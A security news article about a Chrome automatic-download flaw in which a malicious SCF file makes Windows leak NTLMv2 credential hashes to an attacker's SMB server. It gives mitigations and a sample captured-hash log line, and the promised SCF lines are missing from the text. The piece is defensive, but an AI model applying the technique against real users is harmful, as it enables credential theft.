Critical Google Chrome vulnerability could expose your passwords, how to protect yourself
A serious vulnerability has been discovered in Google’s Chrome web browser that could allow hackers to steal victim’s Microsoft service passwords and Windows login credentials remotely. Luckily, some workarounds exist to prevent the issue until Google releases a security update.
The vulnerability exist in the way Chrome downloads files in it’s default configuration. Latest version of the popular web browser downloads files automatically when it deems safe. Even if a malicious file is downloaded this way, it still has to be executed by the user to perform it’s malicious actions. But what happens if the downloaded file requires no user interactions?
This is where the trouble begins. SCF files (Shell Command File) are simply text files that contains also some Windows explorer commands to be run. Since Chrome trusts SCF files and downloads automatically, remote attackers can trick users into visiting their website containing malicious SCF files!
Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the “icon “.
A SCF file containing the following lines simply tricks Windows operation system into an authentication attempt to a remote SMB server set up by the attacker in order to capture victims username and password hash for offline cracking.
The captured information by the attacker containing victim’s username, domain name and password hash will look as follows:
NTLMv2 Response Captured from 220.127.116.11:62521 – 18.104.22.168
USER:Bosko DOMAIN:Master OS: LM:
It is strongly recommended to disable automatic downloading in Chrome browser. To do so, you need to go Settings -> Show advanced settings -> and check ‘Ask where to save each file before downloading’ option.
Manually approving each download attempt significantly decreases the risk of NTLMv2 credential theft attacks using SCF files.
And system admins can simply block outbound SMB requests (LAN to WAN) by denying TCP port 139 and port 445.
Please subscribe to our free security newsletter.
940 total views, 7 views today